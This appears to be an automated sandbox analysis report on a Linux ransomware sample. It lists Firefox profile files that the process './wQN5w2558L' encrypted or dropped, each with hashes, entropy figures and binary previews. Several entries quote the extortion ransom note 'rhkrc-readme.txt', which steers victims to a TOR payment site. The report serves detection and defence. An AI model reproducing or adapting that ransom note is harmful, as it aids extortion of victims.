                  Malicious:false
                  Reputation:low
                  Preview: .f......"...G...5..zx0.8.p...m...9..R.#_..}l.E5..RE.....~..MA...>.d.t.D.gO..*BR...(Z9.o.sC..c\.*OV....v.......IS(v...y.<...........B..)..G`..H..C.r.~5D.P......q<L.p....4.....l@J...Q..:[p93.X.....ud...6*P...m..E[.0..).W..e......M<Il..+.\.'..N.".....J.E.R6?#6<:.....v.R`.. d.....!."BU.wTn5....c....L...A..".j...K..s9...x............N.3.B;te*...RT........4.?..."....7..X.h..Yxs='.y...\....d. .1a7.....&.8....0.aq..OES.z.c.....v81.]6??.C.vA;..T.g.S>...f..<[.......p,&gI......3....oA...:1......s.....".".w..N)..._....qO>.........S...|.J..QRvY....O..nT..D.Dd]..9....h.....CmJH......U..B.+..[vt.."Bww..Z.........9!t9.b3P].{..Z..YV...X.g...q5..dkabnl"....VC....J.g.....&.Bzm...|...Q]...........e]...../...i..q..y.WHc.......~.f8.B$(....P.,).*`\b.g...\S...5....-..!.D9..2....cO.g........l..r...nXa.vE.....&@...............k#.3.....r.X..[&..UN.>......."....Xr6..B....o...[..J..........l.Q.......2....;.I...<%........[XLS.......gUH<....qLyV..D......w...~3.....pU.Q..k...G.)....s.Q......Eo!....|l.lpB&K..t.?.I..<.
                  /home/user/.mozilla/firefox/u5o5kk16.default/bookmarkbackups/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.mozilla/firefox/u5o5kk16.default/cert8.db
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):65768
                  Entropy (8bit):7.9973530469494785
                  Encrypted:true
                  SSDEEP:1536:i56ZX30Yo9Koukzi+7xXYYnF936q7XFF2CLiOQQIa/:T0YKw8Foq7XS/QI4
                  MD5:EE187CE6E235FA7417464DB6D22B6E32
                  SHA1:D482E8921AF2F7222157246B717947A2DD512CBF
                  SHA-256:C08CA86D653619126E77AA6B4960A711437462C03C3A29F5388A4A9D0E219F3E
                  SHA-512:523C71D5AB40F3ED41DD3964E45A6968242ECCD7B598E8D47C18B263115F93FA40AEC473320D6B4D8F566F043D30A3A1CDA9DD308071D22BBB1E31F5461D8DB7
                  Malicious:false
                  Reputation:low
                  Preview: *~.1W.....!>....3.c...+...\A.B^..XD!...CM.Q.x.T.._54.....8RX.).Z.L..n..9.G!.n..F..LT.4..o..%m...}J.`2.u......c.x..\.B..s..<..=|.D.8.......D..?.L).........8.'......W-...&./.6...+...u.0.;.....n.3.....x.2N..E..Vn...S."..MA=.4.>.$jh[...J.K.I....r.(.r.UR=...) d...........(l0.jF......D..K....V....t..c4.3......\....oy.......\...c9F......}e+.".7......5.>.4ce..e.N6..A..L..*.>.....F.v.%'....`...%5..3.......D9...........d.Yp..b.R......b...=u.m..,%...k...2.....v.)..'7+m.2..!....[p....w.n.S6.$.ZH....17....vqU!#p.N..&~P)z.YM.yq .*...1.......7K.=:...BUN.I>....<`oso..,.Vi*..b.K+Q.q%..M..._..(.............'y.\...._b:.mD......e.../....9..K..J...D.....1.#.Q...(:...8FN.P>......;..f6m.H...r..<...........*....`..c..Q.c.Rg.!.....M..,o.;VES...`O.;. .4...`fJ.h.....t]..`..$..1...z.2.......?...-[..:..S.."0.:(..ytnj..9_q.jng.rS..T....S...P?..v..Q.B..e.d...5........C.7.....d..f`@./..u..0.....*."0.=.c........./Z"...c.x-J...f{.....9).I.KauN.....e.k..^.. .9.c[n.Z..v.-.'.coy...%H......'@=z.}.@A..jG{.. ym;m.LonJw/.Z...
                  /home/user/.mozilla/firefox/u5o5kk16.default/cert9.db
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):229608
                  Entropy (8bit):7.999207141612756
                  Encrypted:true
                  SSDEEP:6144:jt2CqhOaVc7RnTNtRNTmJiRAKxcWv1Ihz8LBGj0SKsU4Xt0:56hbVsnTPqkLFv1rFMXt0
                  MD5:63B9F362CA926E6D28E5A0E48AEBB151
                  SHA1:2986502A39508A2170F0F17E8C6839ECE0CA31AE
                  SHA-256:06ECB59E558E8B51F2C0783C715F4989540E198D97D2E7D66FCDC178F6BBBE2F
                  SHA-512:A3B3D7DF9932C7F36D63173AE57C927EB7441E92131EA8563E65A66ECFE1E71050A6A6C27327E637489111EC102465E1B57B17C60C3BEA75E6A64DF224680D4B
                  Malicious:false
                  Reputation:low
                  Preview: ....a...0e...)....a..^.".-9....U....p.....N...K...&L!P...QS.j.e+K.Uq .C._.F....a...w]7.....q..w.......!..F..E.p8z.....L.z..3..vw9H;55.,..%.+....{...s@..0<)...w....$.}.S4=$......s..U..2b..r;.(.U.h..E3.....0..\X....8B..x.L..5........U..!e..|H..1x..el...g.\W......q5..ty.<!o.......D&=."..1p:....l......4a...%Co.......~.p..A#_...!I`..N....D.2....d......[P.4.....S[vw.....&.....[....#........]P~..P........q..w.......4.!{...zP..m.....|t.v....M.).......\....$|8=b.`9.....VH........5e..JH.......T^[...#..}...g60...F....E..J...............x.bH...-.+..j.w.....P.=.k..^..p^H..(.[..7.~.c..aL..sd.5jd7...2.f...H..H..D.3.....#..5x......2(^:.J.;%..q..\H...oa.{_....vD{....J......J..Z....yh......:q......nW...S....3.....................0...T..............@....lr....&]?..........|w......B..........i...eR...9...$......X....q..m.W.Xn"[.3o..)hJ...].....S..xq....qB$l`.+.....S}[(..8...2...&A7C..T..................u.+;.2{.0V.<.z....t.._...e..d..p....Vst......;......HTA........qXp..L&...px.+K.u.,K!...y.......K......*.
                  /home/user/.mozilla/firefox/u5o5kk16.default/compatibility.ini
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):392
                  Entropy (8bit):6.354393050141778
                  Encrypted:false
                  SSDEEP:6:ETh4Dmp5YmBZdCV9ZGcfwztGFm2HVU1zmhOO/EUyp6Xc//c9912YV:EiDrsZdKOcVI2DcUBj2YV
                  MD5:E08C5400F2D7E039B5AB9191E66AC6AF
                  SHA1:08F787C1F2006ABF87737D47BDEC9FAF68590AF4
                  SHA-256:5F8E77DBB0BB2AEADF2E575BB76FCB1162B4CF8F224074721F8207BD8F5662F3
                  SHA-512:116BFC52EBCBD320FA8D8137C38CA8D03DC9262817E2D6DDA995F5E5C3C4EC6BFDC4543128F5CF0B48246D918121F0A103AAFB0599AFE18C5036FB58BFF5FD1C
                  Malicious:false
                  Reputation:low
                  Preview: ...l/..ud]E$_...P...BJ.u..)....b.......j.tL.v.;.-..>}....xCW..d...1..Y......#e.:.57R`+A_,.YfV.Ns'%)..8.......9.d....S$Z*...+.I.........X.........v......T.3z.Z..%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.........................................................................................7...1.Cl.Z O4....9c.I;....~2.D'..!.1./c.K.q.........^5v
                  /home/user/.mozilla/firefox/u5o5kk16.default/containers.json
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):1041
                  Entropy (8bit):7.527439000455274
                  Encrypted:false
                  SSDEEP:24:LbV6/oIkWNy/m6CzOc3tNdm0Qtac+f2P0Zr+QA8XMud/I2DfYYrn:fV6/6W4/m6i/Q0Qtv10ss99BDwIn
                  MD5:9B9C1C91B4EB73F1D293680093E27DCE
                  SHA1:35B68F34E5DED440DD6D25C75B2E1C4566D41791
                  SHA-256:7B483E17499C9BE8C399AE245E39326E361615E9D4956CF54BFBA7C0A7E80180
                  SHA-512:990DF30E5E017A6657B6D5008152FA311D8F279DB3B8D7B7E7611DF8658CFD8F5F045609BE488695FD315D9C7A485B62204B1673B2FE61D6C68D7AD942D60A7E
                  Malicious:false
                  Reputation:low
                  Preview: JQ.\V.0..b.BU........m./..3=I..6..Ji=ry..................^...:D._..W........|%....[.:2.....-..,..h[j..D.y.....m./........t.h.}...P...a...5(C*0...q.(6.=.|.z.AKQ]5...6........3@..L.g.v..~..........2fh\6g...J.....Q....!.i$.&.{...`.EM...tws....;..Er......f..A..^..Q......C..G.D.....b.'J.--r.)Va.XC.%...&.o.k.]/kS._.Mz.....#...l.O7.#E].9.........g.+1.5ta....;........9.$-..[].......a&..N....o..bL.x....T..*..F..o..Q,.B.N..U....G.S)...!.:..R.Q>o.:Pc] ....sk.]MW....z..k.....C..f{.....K"u...$...*ls....d`......A.^z.........(..........,2u..4......'...q(..3..].l..S].J.N.ZG.p...X~"...,o.y<B..(.`.P..u...\.w.E..Tg....n...........@....cn.Q.n..-|wjmb......#q..}.=........i.....Q...=.!c.....}{a....>.h).i+.f.*..}.go.sA12.1N6...iR.n9r...7..@.fgW.cB.9A.......(.?.*[.....iC. Yy.*......w.C.....N...[W....B5U.,%.s.@ku....5.UU.>%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................../N.l..._o....
                  /home/user/.mozilla/firefox/u5o5kk16.default/content-prefs.sqlite
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):229608
                  Entropy (8bit):7.999151060905819
                  Encrypted:true
                  SSDEEP:6144:fYzrBxHw2tfGvKYRemvrEC/NkI2zkxvCksacgKTmF8V1RnAXLYvR0:fYzzHjf+KYjEBIaiacK5V19AXLYvR0
                  MD5:EDD515134D0D9C9D5EFAC8D6FA8CD32A
                  SHA1:D458FBCDE75E96361B0446E0CC7C2BEEA6C81393
                  SHA-256:CCAF749338F029A01F904ADDD554E4AFA60040771902C1C0F26BD0A11579B1D5
                  SHA-512:8C84961EE2C81B630CF2D0E2512462DA4FCAD10CB298E934FAC27B9021FF8C0022869CD1FBC3D7C45584E5163ECE34A8BA6FA7CCC53F632375F7187390A75EFC
                  Malicious:false
                  Reputation:low
                  Preview: ...!G..j..I.E$."'....N.?G.(p.>.^@./V~....R\../MnX..g.I..3...........w..Q&P...c..>.$t..\.........]X@|..p{.4..Wx...<..4.z$N.]D7m..2.)H.G..=..........o..F_..R.$Tj..U.m...L|2x(M..".$...`.... .L.......c...`4.P.q_....5 .N>....m..o+....x%.(LT...')..<]|:..2K........u.y..SX.6@d...].C.......N..1)..].[4...A..aJ..[f. ..H......>...U.m...B...M.5....{......>....>...y......*.7,{(Eq-m...+J+v..P..v....rI........iM..q..z..|f...o&..I'}q...@..5.e,d...U....`y...`~<........#!#*a.Q.k.h..P.L....z........#.<.{...P....,.........O.{..S.......$.(R..;.QZ..$.B.....\....`.wL...(...f6.....;........t,..q.X..K......{.#.:......b[xJ....j.......U..9.#....p......)....zUb..d.b...........=....!...n.35f/6../h....Yl&...L.>.o0>......a.4...R..c.w.GG2.I.5.=....^....$).~.8.k...Y[........A.......c.[.O[.O.;.......a...9........8.....Q.......td>..Kz..6c...$w....K.^.x..8..]...8..@.T#..`0G..W...........XL.=M....n..x.g}..P...!+s...t..|].........T...............Q5.B..PY3.<.-..q...(...7p.........J{f.&...?.y.*.v4.<...z.<.Q..!+.>..P7.=E&.....
                  /home/user/.mozilla/firefox/u5o5kk16.default/cookies.sqlite
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):524520
                  Entropy (8bit):7.999612380049812
                  Encrypted:true
                  SSDEEP:12288:EuD9/g5JQed8ufaUwepSm7LyZUaMmiTgLaOB2//hFvDudgJZSChj:Ec/g5x8ufdd7Lyb8yuZSChj
                  MD5:C1E212846FAF86BDD7990ED3306E1FAE
                  SHA1:2E9704E6281AC1F1C53D60570A97002A0A22E092
                  SHA-256:44A023A9ADD88651FA713B60365513AE746E5A5446E5DDEAFD6588833A29D6F3
                  SHA-512:FB4CA462A5CAC98BBC0B8A9D23B8D4B18A0CB514D24C1CDC2C4A107954EEFBE1D7F9D5C5F157B8ABF0D23AC2698C2B9AB11E5E89358BF3245102A4F8D9D89D7F
                  Malicious:false
                  Reputation:low
                  Preview: 7.RL>.p..4.3ex.s8.UY/..C.?....|..K.>...s..nFK.[..W.......kg...@..c...^Z.N.3Q......v....PUK...KI..4}.Mi...s^..>.ZeH......Y..T./xt....mZ...Jv.j..p.....z\.*...u0...~.[:.JV......u.T........J..j....]/wn.M$S}......Z?a..0]%......)...h..z......l.q.6.f.K5..bQ..<.wQ.nB.........K.....L..g...GR....6m....t..7...?..=5V..+=f..1...A#s........Z../..2..\..}...2..g...&4....=/..U.aW..~.7.2-...A<~ZNQ*.......!"....Ue.......F...(C.x'...h...|.mu..Kz...y.....9p...=.Q8...~....b..M...!0..K...-.....;!..I..K.q....E ..C...O...'.3.u)s...H...b...p...*v;.a2H..HGC.......U.?.<..p|.`....7.g%s..E.&........N..AVk)..XY.........9/D..Vew."...E.l'..+..8_..7.#].'.@.....g.~1,$..p.P...G!.r!......J..?.......=...i.LSN.K.....^...RD.....%...(..{)4..1#.R.mj?......W..H..i..cG\=......[.Ep...1.....a_.m.....`.Kq=....p...d..B..!.....5..`9..).q?.......@...S.".gT.-z.:WJ.S.\.,..n..........6.vK.$s.h....._&........~%}c.e.m....R...c....~.h/..d...|.fN.AK..;|q..+(2v5Q...E...._..o.2P...;...P...~...<...?.O.Sk.spt.fp....J..<...+I..I.....(+..h.P....x#
                  /home/user/.mozilla/firefox/u5o5kk16.default/crashes/events/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.mozilla/firefox/u5o5kk16.default/crashes/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.mozilla/firefox/u5o5kk16.default/datareporting/archived/2018-04/1524571606142.e0d24830-8ed6-4f1a-b4e9-bfe84de4fc39.new-profile.jsonlz4
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):3138
                  Entropy (8bit):7.881091478251511
                  Encrypted:false
                  SSDEEP:48:FxnxJDLmy9nGMsVLEwH7xsPHsJ+f8MaRxjcYrkIlXtWgF1tj16ZqvEEqz4pSaDC:FXHzsVwtsJ+dgtcykMXth91tsfUpSaDC
                  MD5:FE3D7C8B0AD382AC82598B2AF34741A3
                  SHA1:22A038CF5AFB2CEECA7464E8F4AA372B79E88F05
                  SHA-256:5F78B8FEE0DC5ADF78857DE3E623C803878DE3FEB301F319E276F7057DACED9A
                  SHA-512:072B698468D62C68413DF0BE758B2B88456458D4C285A5EBDABBD3238B999B63EBE5593A7339CBC5DA0D55C72EB324A6162DA2BA2B8E8BB09AD93F6D64CF7DFC
                  Malicious:false
                  Reputation:low
                  Preview: ..&Q...Mv..Q.x%/_@....q(n[V..,fb.+.H@4.M7.b.`...P..O.TM...Hf..uG)=.$.+6..5..tpH\........^p.K....y..'yb.Q=.A.J.-.s.o...uxs...4*.Ts.Ek=-..=......y.S.og..iE..%..dg.e.3..S.b#.`.A..8...{qv.....c6.r.._.=....].....[....Z/.){.....3Q..j8.....].g.............9...L.-.%i..3....8.m....p..Y..........6.........mL/.).(yG..@.7D.!uzD....i*..)O......a2?;6.F..E~.C...a.......W...E.....H...r\i....a>......7.Z..^.l.T.....#.....!..#~..3.......f....#yS.K.1.!M....F'(....?.#..T.P.'.1f.l...`...:.a...........Wb..$....m.z^...lug....(eZ.G...0...^._..3a...@CD.<*eB+4&......b...PQ....7!.0o..C;..6`.~.)..W.....6......&5...2Q.".I@U.^m..;..?.b..*~...rV.<:...%....T;O.......]..].=,I...u.....=....S.v.....w......V....d.....z'.Se*.N....h.......E.....`.J}|..x.*5...G=..t...XU..U...,2J...R...........J...i......:.........sy.8.h......'tiH...0.`zL;:TO]....p#.\...6...".q.D..XJr..c}z.^lb..9.~..#....Q....w..&.$.%.:.... ER...|..!%#.....02....[..4}?..m.h..z..k..'..M\..+BR/.G...1....~.oB....sn%.gY.Qk.B..z.) .".N.C .....MW....-..K.o*.L7..z@9
                  /home/user/.mozilla/firefox/u5o5kk16.default/datareporting/archived/2018-04/1524571606162.9c07e1b5-a82a-432e-9a4c-18a3a975ad85.main.jsonlz4
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):8662
                  Entropy (8bit):7.962958073119613
                  Encrypted:false
                  SSDEEP:192:FQuAr2aXrGZ0sP/m3fMxpiWuwLea7wRFzol1U3zNiNkh4CU1cadaX+:yuCb9c2UuWuRGl1U3JCkNsrd2+
                  MD5:FE1C057035D80726FA79188F95F8D810
                  SHA1:3CC7C572F5F9BC2498889F7605C6D125D9B04BBC
                  SHA-256:0984276130C835BB3C1025E2225DFB3EE396DFE615682818BD4691B2AD38DAA6
                  SHA-512:ECE92459C84DAE9C24AF20D77C2A2EE72A4A6C908EDC47BFCCDC5BA26E4B0424F099C100470A8827DC6EE2AD4555E7E0CBA4F02F362A96090CC71B6571C92F38
                  Malicious:false
                  Reputation:low
                  Preview: .......K..*...8jy.9.]...v.f..u....v....x?..........w.....e..U'.....Y..rR...t_..... ..Z......U(....m......".<....<.7..Z.Bn..~u.-PD?k.c......v...@...............u.....q.}......0D:4c.S.@.....K....]_).y3.I.2'............@X. .......)....d.H...".....}:].Or?..>..;@.....t....i..w}%.5..+.Y...v...L~h............a.4....b[.B.r.....J.."d3CE..76{.....k.../.R..`\.u.kAc. .WK.7...N.....NZ...+^.x...Tp..K....n7...........EMP]e......9.C.O....\..W.r.....W..n..*..ZQ..`......pY.^.yE....R......|.3..s.p.Ay<...j.`!6'.q.y.z.I=,..F[:kY.....\.$&?/a..c.x5..*.ONZ..h..8.o...e.....6.k.ao....(q...C`.i......".~x......c..M...e.......<...*.......D....T....+u.....`oWT...e.....TI..x9....F4.....%v|d...A.....,..U...8.j....c....`6^....^...9.1.|...G....J..x.......XU.qnK..*b.}.^.hb..S..%..@y...\....~;.;.<4e..Nk...g...vm.m............:..db ...iJ.......d.....Q%.m..<bP....-."8X\...U.;...Vj....O..w...0.o.S...(..d.Q.dR..J.o...B.[.....F=N..;......V:0.6..58...!.)..$.'V...X.Ee.N8.S.V......~u..s.7.^...5.......EZ...<j0"_..H&..DYK{.......s
                  /home/user/.mozilla/firefox/u5o5kk16.default/datareporting/archived/2018-04/1524571606164.583ee681-7cfa-4d12-8648-eb797a8eec37.first-shutdown.jsonlz4
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):8664
                  Entropy (8bit):7.968227270432986
                  Encrypted:false
                  SSDEEP:192:M2nPrPAodPo4aLJECTQLNRTi1qCYDvBBliL2A1IPY/C1+5yBf+A:M4rPrNo4YrTQy1qCGvBGScIPyCfB2A
                  MD5:9A6A853C9ABC3F05C923EE306DA7E020
                  SHA1:48853CA4F4F5EA268241EB29C91638F8A9C7BCED
                  SHA-256:65E7FAEB5E9AC4710F6A7A3B0BD7067369A14B958D84CCC43B72E9FBD9A4EBD1
                  SHA-512:CFF3F0C89CEF585FFAC4CA4FA18B06C77AED158754BDF78326DB64DE3139192419FA066DD9C2B7B21D07059ED7A4DAEF5293F5BC10C556D40A545E87D699F246
                  Malicious:false
                  Reputation:low
                  Preview: ..R.X'...._?Y.)ib.%..%...GY.....7-.jO...t....%3.......N...=.8*..Sa.....~...._..V...b......aj....m..X....\-|%Y..i..l..P......+.R......+....h.........~//?.V..=.=...k..;...H......_g...ye...2m.5.J.....<......j..'c$R.(.......j.P9+..&9.{b].Y....i.<....Jm+.....4.g...<.....>..c...C..M,o.:..\+...)... ..2j.....a...).A}..V[..C3bt$.{n....F.y.SW._P..c.sQ.I...X.{Xq.)..}e.>.f9.V..F0{..@j:.]>....l....if7.m.U..pHiDw=...I,.3.c6.*.}Y.#..FXUJJ..u.:..f....UG+.-`...btK....H.r...(..VA..g.($.9.....7.g....V..Oy.Z.V.y..FsE...D.ob.....%Z........W"w..`.p......B2...Sgy.l.u.}eLb..*$+Rd..e,jO....../..TM.>fAm..0....R..I...)..W.."#......pX.4.....o..G.iO.....T...D.{.o.._U].+.G.M.....v1P.0......r.I.p0p.KG..._......R..9f......o..7.Bo.>.O.......^...g...........g.}0.j.jyg....jc...>.........R.$8,.ZT..e..\.-..I..m.!.E}H.o...&br.h.5...t.K..V.F>...wz..h.r.&`}O.v~Y.\?{sI.C...0CUp...KZ.....d...C..9...`..p...H.?.....".b.l.p.....1.n2:.t...z.}..a..j.E.a../!?$........:....T....u..cF.zK..|^Ht.........ZVs........L....}s.....LYS..B.W..
                  /home/user/.mozilla/firefox/u5o5kk16.default/datareporting/archived/2018-04/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.mozilla/firefox/u5o5kk16.default/datareporting/archived/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.mozilla/firefox/u5o5kk16.default/datareporting/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.mozilla/firefox/u5o5kk16.default/datareporting/session-state.json
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):393
                  Entropy (8bit):6.280092995284078
                  Encrypted:false
                  SSDEEP:6:+y5Xi3Zaqnkya+TwPab2l9ONdCS5soUa1zmhOO/EUyp6XcARGqFZkjum/kn:+y5XUQqmsw42Yx5sXm2DcUB7GqFZ/
                  MD5:F307FB96DE97589A72D6B8CE8AA36B4F
                  SHA1:A6A2571775511E7AA546BEDE72C0710F33A11091
                  SHA-256:D7CBF71398B859419B01FD443B7EED4053B6513BBB02F3A423404AFABC6013CB
